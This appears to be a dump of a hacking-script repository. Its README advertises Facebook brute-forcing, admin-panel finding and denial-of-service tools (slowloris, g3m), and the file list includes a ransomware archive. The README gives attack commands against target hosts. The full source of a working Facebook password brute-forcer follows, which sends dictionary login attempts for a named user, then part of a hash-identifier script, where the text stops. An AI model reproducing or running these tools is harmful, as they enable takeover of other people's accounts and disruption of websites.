├── README.md ├── fb-brute.pl ├── g3m ├── hash_id_v1.1.py ├── painel.pl ├── ransomware.zip └── slowloris.pl /README.md: -------------------------------------------------------------------------------- 1 | # Scripts for testing. 2 | 3 | * fb-brute.pl = Bruteforce for Facebook 4 | * hash_id_v1.1.py = Hash Identifier 5 | * painel.pl = Admin Control Panel Finder 6 | * slowloris.pl = Denial of Service 7 | * g3m = Denial of Service 8 | 9 | How to Install and use 10 | ---- 11 | 12 | `fb-brute.pl` 13 | ```sh 14 | $ sudo chmod +x fb-brute.pl 15 | $ perl fb-brute.pl id-user-facebook wordlist.txt 16 | ``` 17 | 18 | `hash_id_v1.1.py` 19 | ```sh 20 | $ sudo chmod +x hash_id_v1.1.py 21 | $ python2 hash_id_v1.1.py 22 | ``` 23 | 24 | `painel.pl` 25 | ```sh 26 | $ sudo chmod +x painel.pl 27 | $ perl painel.pl 28 | ``` 29 | 30 | `slowloris.pl` 31 | ```sh 32 | $ sudo chmod +x slowloris.pl 33 | $ perl slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -tcpto 5 34 | $ perl slowloris.pl -dns IP 35 | ``` 36 | 37 | `g3m` 38 | ```sh 39 | $ sudo chmod +x g3m 40 | $ ./g3m -h ip -T 3 #Attack private internet 41 | $ ./g3m -h ip -T 3 -p 80,80 #Attack websites 42 | ``` 43 | -------------------------------------------------------------------------------- /fb-brute.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # Bruteforce-Facebook 4 | # 5 | # Description: 6 | # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS. 7 | # 8 | # Usage: 9 | # perl Imad'Ox-Bruter.pl login wordlist 10 | # login could be either a user's email address or profile name 11 | # 12 | # Module Requirements: 13 | # 14 | # Install module if missing: 15 | # perl -MCPAN -e 'install Net::SSLeay' 16 | # 17 | # Demo: 18 | # perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst 19 | # 20 | # --- Imad'Ox-Bruter Facebook password cracking tool 21 | # --- By Imad'Ox Hunter 22 | # --- www.facebook.com/imad.elouajib 23 | # 24 | # [+] Cracking Facebooklogin@facebook.com ... 25 | # 26 | # [-] test -> Failed 27 | # [-] test123 -> Failed 28 | # [-] testtest -> Failed 29 | # [-] testest123 -> Failed 30 | # [-] qwerty -> Failed 31 | # [-] azerty -> Failed 32 | # [-] password -> Failed 33 | # [-] password123 -> Failed 34 | # 35 | ######################################################## 36 | # [+] CRACKED! Your password is P@$$W0RD 37 | ######################################################## 38 | # 39 | 40 | use strict; 41 | use Net::SSLeay::Handle; 42 | 43 | if(!defined($ARGV[0] && $ARGV[1])) { 44 | 45 | system('clear'); 46 | print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; 47 | print "+++ Coded by Imad'Ox-Hunter\n"; 48 | print "+++ www.fb.com/imad.elouajib\n\n"; 49 | print "+++ Usage: perl $0 login wordlist\n\n"; 50 | exit; } 51 | 52 | my $user = $ARGV[0]; 53 | my $wordlist = $ARGV[1]; 54 | 55 | open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n"; 56 | 57 | print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; 58 | print "+++ Coded by Imad'Ox-Hunter\n"; 59 | print "+++ www.fb.com/imad.elouajib\n"; 60 | print "\n[+] Now Cracking $user ...\n\n"; 61 | 62 | while (my $password = ) { 63 | chomp ($password); 64 | $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg; 65 | 66 | my $a = "POST /login.php HTTP/1.1"; 67 | my $b = "Host: www.facebook.com"; 68 | my $c = "Connection: close"; 69 | my $e = "Cache-Control: max-age=0"; 70 | my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 71 | my $g = "Origin: https://www.facebook.com"; 72 | my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"; 73 | my $i = "Content-Type: application/x-www-form-urlencoded"; 74 | my $j = "Accept-Encoding: gzip,deflate,sdch"; 75 | my $k = "Accept-Language: en-US,en;q=0.8"; 76 | my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3"; 77 | 78 | my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa"; 79 | my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In"; 80 | my $cl = length($post); 81 | my $d = "Content-Length: $cl"; 82 | 83 | 84 | my ($host, $port) = ("www.facebook.com", 443); 85 | 86 | tie(*SSL, "Net::SSLeay::Handle", $host, $port); 87 | 88 | 89 | print SSL "$a\n"; 90 | print SSL "$b\n"; 91 | print SSL "$c\n"; 92 | print SSL "$d\n"; 93 | print SSL "$e\n"; 94 | print SSL "$f\n"; 95 | print SSL "$g\n"; 96 | print SSL "$h\n"; 97 | print SSL "$i\n"; 98 | print SSL "$j\n"; 99 | print SSL "$k\n"; 100 | print SSL "$l\n"; 101 | print SSL "$cookie\n\n"; 102 | 103 | print SSL "$post\n"; 104 | 105 | my $success; 106 | while(my $result = ){ 107 | if($result =~ /Location(.*?)/){ 108 | $success = $1; 109 | } 110 | } 111 | if (!defined $success) 112 | { 113 | print "[-] $password -> Not Him :( \n"; 114 | close SSL; 115 | } 116 | else 117 | { 118 | print "\n########################################################\n"; 119 | print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n"; 120 | print "########################################################\n\n"; 121 | close SSL; 122 | exit; 123 | } 124 | } -------------------------------------------------------------------------------- /g3m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sup3r-Us3r/scripts/292290b4e86a2e90ac643912aad2b516f4ea974b/g3m -------------------------------------------------------------------------------- /hash_id_v1.1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # Hash Identifier v1.1 4 | # By Zion3R 5 | # www.Blackploit.com 6 | # Root@Blackploit.com 7 | 8 | logo=''' ######################################################################### 9 | # __ __ __ ______ _____ # 10 | # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # 11 | # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # 12 | # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # 13 | # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # 14 | # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # 15 | # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # 16 | # By Zion3R # 17 | # www.Blackploit.com # 18 | # Root@Blackploit.com # 19 | #########################################################################''' 20 | 21 | algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} 22 | 23 | # hash.islower() minusculas 24 | # hash.isdigit() numerico 25 | # hash.isalpha() letras 26 | # hash.isalnum() alfanumerico 27 | 28 | def CRC16(): 29 | hs='4607' 30 | if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: 31 | jerar.append("101020") 32 | def CRC16CCITT(): 33 | hs='3d08' 34 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 35 | jerar.append("101040") 36 | def FCS16(): 37 | hs='0e5b' 38 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 39 | jerar.append("101060") 40 | 41 | def CRC32(): 42 | hs='b33fd057' 43 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 44 | jerar.append("102040") 45 | def ADLER32(): 46 | hs='0607cb42' 47 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 48 | jerar.append("102020") 49 | def CRC32B(): 50 | hs='b764a0d9' 51 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 52 | jerar.append("102060") 53 | def XOR32(): 54 | hs='0000003f' 55 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 56 | jerar.append("102080") 57 | 58 | def GHash323(): 59 | hs='80000000' 60 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 61 | jerar.append("103040") 62 | def GHash325(): 63 | hs='85318985' 64 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 65 | jerar.append("103020") 66 | 67 | def DESUnix(): 68 | hs='ZiY8YtDKXJwYQ' 69 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: 70 | jerar.append("104020") 71 | 72 | def MD5Half(): 73 | hs='ae11fd697ec92c7c' 74 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 75 | jerar.append("105060") 76 | def MD5Middle(): 77 | hs='7ec92c7c98de3fac' 78 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 79 | jerar.append("105040") 80 | def MySQL(): 81 | hs='63cea4673fd25f46' 82 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 83 | jerar.append("105020") 84 | 85 | def DomainCachedCredentials(): 86 | hs='f42005ec1afe77967cbc83dce1b4d714' 87 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 88 | jerar.append("106025") 89 | def Haval128(): 90 | hs='d6e3ec49aa0f138a619f27609022df10' 91 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 92 | jerar.append("106160") 93 | def Haval128HMAC(): 94 | hs='3ce8b0ffd75bc240fc7d967729cd6637' 95 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 96 | jerar.append("106165") 97 | def MD2(): 98 | hs='08bbef4754d98806c373f2cd7d9a43c4' 99 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 100 | jerar.append("106060") 101 | def MD2HMAC(): 102 | hs='4b61b72ead2b0eb0fa3b8a56556a6dca' 103 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 104 | jerar.append("106120") 105 | def MD4(): 106 | hs='a2acde400e61410e79dacbdfc3413151' 107 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 108 | jerar.append("106040") 109 | def MD4HMAC(): 110 | hs='6be20b66f2211fe937294c1c95d1cd4f' 111 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 112 | jerar.append("106100") 113 | def MD5(): 114 | hs='ae11fd697ec92c7c98de3fac23aba525' 115 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 116 | jerar.append("106020") 117 | def MD5HMAC(): 118 | hs='d57e43d2c7e397bf788f66541d6fdef9' 119 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 120 | jerar.append("106080") 121 | def MD5HMACWordpress(): 122 | hs='3f47886719268dfa83468630948228f6' 123 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 124 | jerar.append("106140") 125 | def NTLM(): 126 | hs='cc348bace876ea440a28ddaeb9fd3550' 127 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 128 | jerar.append("106029") 129 | def RAdminv2x(): 130 | hs='baea31c728cbf0cd548476aa687add4b' 131 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 132 | jerar.append("106027") 133 | def RipeMD128(): 134 | hs='4985351cd74aff0abc5a75a0c8a54115' 135 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 136 | jerar.append("106180") 137 | def RipeMD128HMAC(): 138 | hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' 139 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 140 | jerar.append("106185") 141 | def SNEFRU128(): 142 | hs='4fb58702b617ac4f7ca87ec77b93da8a' 143 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 144 | jerar.append("106200") 145 | def SNEFRU128HMAC(): 146 | hs='59b2b9dcc7a9a7d089cecf1b83520350' 147 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 148 | jerar.append("106205") 149 | def Tiger128(): 150 | hs='c086184486ec6388ff81ec9f23528727' 151 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 152 | jerar.append("106220") 153 | def Tiger128HMAC(): 154 | hs='c87032009e7c4b2ea27eb6f99723454b' 155 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 156 | jerar.append("106225") 157 | def md5passsalt(): 158 | hs='5634cc3b922578434d6e9342ff5913f7' 159 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 160 | jerar.append("106240") 161 | def md5saltmd5pass(): 162 | hs='245c5763b95ba42d4b02d44bbcd916f1' 163 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 164 | jerar.append("106260") 165 | def md5saltpass(): 166 | hs='22cc5ce1a1ef747cd3fa06106c148dfa' 167 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 168 | jerar.append("106280") 169 | def md5saltpasssalt(): 170 | hs='469e9cdcaff745460595a7a386c4db0c' 171 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 172 | jerar.append("106300") 173 | def md5saltpassusername(): 174 | hs='9ae20f88189f6e3a62711608ddb6f5fd' 175 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 176 | jerar.append("106320") 177 | def md5saltmd5pass(): 178 | hs='aca2a052962b2564027ee62933d2382f' 179 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 180 | jerar.append("106340") 181 | def md5saltmd5passsalt(): 182 | hs='de0237dc03a8efdf6552fbe7788b2fdd' 183 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 184 | jerar.append("106360") 185 | def md5saltmd5passsalt(): 186 | hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' 187 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 188 | jerar.append("106380") 189 | def md5saltmd5saltpass(): 190 | hs='d8f3b3f004d387086aae24326b575b23' 191 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 192 | jerar.append("106400") 193 | def md5saltmd5md5passsalt(): 194 | hs='81f181454e23319779b03d74d062b1a2' 195 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 196 | jerar.append("106420") 197 | def md5username0pass(): 198 | hs='e44a60f8f2106492ae16581c91edb3ba' 199 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 200 | jerar.append("106440") 201 | def md5usernameLFpass(): 202 | hs='654741780db415732eaee12b1b909119' 203 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 204 | jerar.append("106460") 205 | def md5usernamemd5passsalt(): 206 | hs='954ac5505fd1843bbb97d1b2cda0b98f' 207 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 208 | jerar.append("106480") 209 | def md5md5pass(): 210 | hs='a96103d267d024583d5565436e52dfb3' 211 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 212 | jerar.append("106500") 213 | def md5md5passsalt(): 214 | hs='5848c73c2482d3c2c7b6af134ed8dd89' 215 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 216 | jerar.append("106520") 217 | def md5md5passmd5salt(): 218 | hs='8dc71ef37197b2edba02d48c30217b32' 219 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 220 | jerar.append("106540") 221 | def md5md5saltpass(): 222 | hs='9032fabd905e273b9ceb1e124631bd67' 223 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 224 | jerar.append("106560") 225 | def md5md5saltmd5pass(): 226 | hs='8966f37dbb4aca377a71a9d3d09cd1ac' 227 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 228 | jerar.append("106580") 229 | def md5md5usernamepasssalt(): 230 | hs='4319a3befce729b34c3105dbc29d0c40' 231 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 232 | jerar.append("106600") 233 | def md5md5md5pass(): 234 | hs='ea086739755920e732d0f4d8c1b6ad8d' 235 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 236 | jerar.append("106620") 237 | def md5md5md5md5pass(): 238 | hs='02528c1f2ed8ac7d83fe76f3cf1c133f' 239 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 240 | jerar.append("106640") 241 | def md5md5md5md5md5pass(): 242 | hs='4548d2c062933dff53928fd4ae427fc0' 243 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 244 | jerar.append("106660") 245 | def md5sha1pass(): 246 | hs='cb4ebaaedfd536d965c452d9569a6b1e' 247 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 248 | jerar.append("106680") 249 | def md5sha1md5pass(): 250 | hs='099b8a59795e07c334a696a10c0ebce0' 251 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 252 | jerar.append("106700") 253 | def md5sha1md5sha1pass(): 254 | hs='06e4af76833da7cc138d90602ef80070' 255 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 256 | jerar.append("106720") 257 | def md5strtouppermd5pass(): 258 | hs='519de146f1a658ab5e5e2aa9b7d2eec8' 259 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 260 | jerar.append("106740") 261 | 262 | def LineageIIC4(): 263 | hs='0x49a57f66bd3d5ba6abda5579c264a0e4' 264 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: 265 | jerar.append("107080") 266 | def MD5phpBB3(): 267 | hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' 268 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: 269 | jerar.append("107040") 270 | def MD5Unix(): 271 | hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' 272 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: 273 | jerar.append("107060") 274 | def MD5Wordpress(): 275 | hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' 276 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: 277 | jerar.append("107020") 278 | 279 | def MD5APR(): 280 | hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' 281 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: 282 | jerar.append("108020") 283 | 284 | def Haval160(): 285 | hs='a106e921284dd69dad06192a4411ec32fce83dbb' 286 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 287 | jerar.append("109100") 288 | def Haval160HMAC(): 289 | hs='29206f83edc1d6c3f680ff11276ec20642881243' 290 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 291 | jerar.append("109200") 292 | def MySQL5(): 293 | hs='9bb2fb57063821c762cc009f7584ddae9da431ff' 294 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 295 | jerar.append("109040") 296 | def MySQL160bit(): 297 | hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' 298 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: 299 | jerar.append("109060") 300 | def RipeMD160(): 301 | hs='dc65552812c66997ea7320ddfb51f5625d74721b' 302 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 303 | jerar.append("109120") 304 | def RipeMD160HMAC(): 305 | hs='ca28af47653b4f21e96c1235984cb50229331359' 306 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 307 | jerar.append("109180") 308 | def SHA1(): 309 | hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' 310 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 311 | jerar.append("109020") 312 | def SHA1HMAC(): 313 | hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' 314 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 315 | jerar.append("109140") 316 | def SHA1MaNGOS(): 317 | hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' 318 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 319 | jerar.append("109220") 320 | def SHA1MaNGOS2(): 321 | hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' 322 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 323 | jerar.append("109240") 324 | def Tiger160(): 325 | hs='c086184486ec6388ff81ec9f235287270429b225' 326 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 327 | jerar.append("109080") 328 | def Tiger160HMAC(): 329 | hs='6603161719da5e56e1866e4f61f79496334e6a10' 330 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 331 | jerar.append("109160") 332 | def sha1passsalt(): 333 | hs='f006a1863663c21c541c8d600355abfeeaadb5e4' 334 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 335 | jerar.append("109260") 336 | def sha1saltpass(): 337 | hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' 338 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 339 | jerar.append("109280") 340 | def sha1saltmd5pass(): 341 | hs='860465ede0625deebb4fbbedcb0db9dc65faec30' 342 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 343 | jerar.append("109300") 344 | def sha1saltmd5passsalt(): 345 | hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' 346 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 347 | jerar.append("109320") 348 | def sha1saltsha1pass(): 349 | hs='58714327f9407097c64032a2fd5bff3a260cb85f' 350 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 351 | jerar.append("109340") 352 | def sha1saltsha1saltsha1pass(): 353 | hs='cc600a2903130c945aa178396910135cc7f93c63' 354 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 355 | jerar.append("109360") 356 | def sha1usernamepass(): 357 | hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' 358 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 359 | jerar.append("109380") 360 | def sha1usernamepasssalt(): 361 | hs='00025111b3c4d0ac1635558ce2393f77e94770c5' 362 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 363 | jerar.append("109400") 364 | def sha1md5pass(): 365 | hs='fa960056c0dea57de94776d3759fb555a15cae87' 366 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 367 | jerar.append("1094202") 368 | def sha1md5passsalt(): 369 | hs='1dad2b71432d83312e61d25aeb627593295bcc9a' 370 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 371 | jerar.append("109440") 372 | def sha1md5sha1pass(): 373 | hs='8bceaeed74c17571c15cdb9494e992db3c263695' 374 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 375 | jerar.append("109460") 376 | def sha1sha1pass(): 377 | hs='3109b810188fcde0900f9907d2ebcaa10277d10e' 378 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 379 | jerar.append("109480") 380 | def sha1sha1passsalt(): 381 | 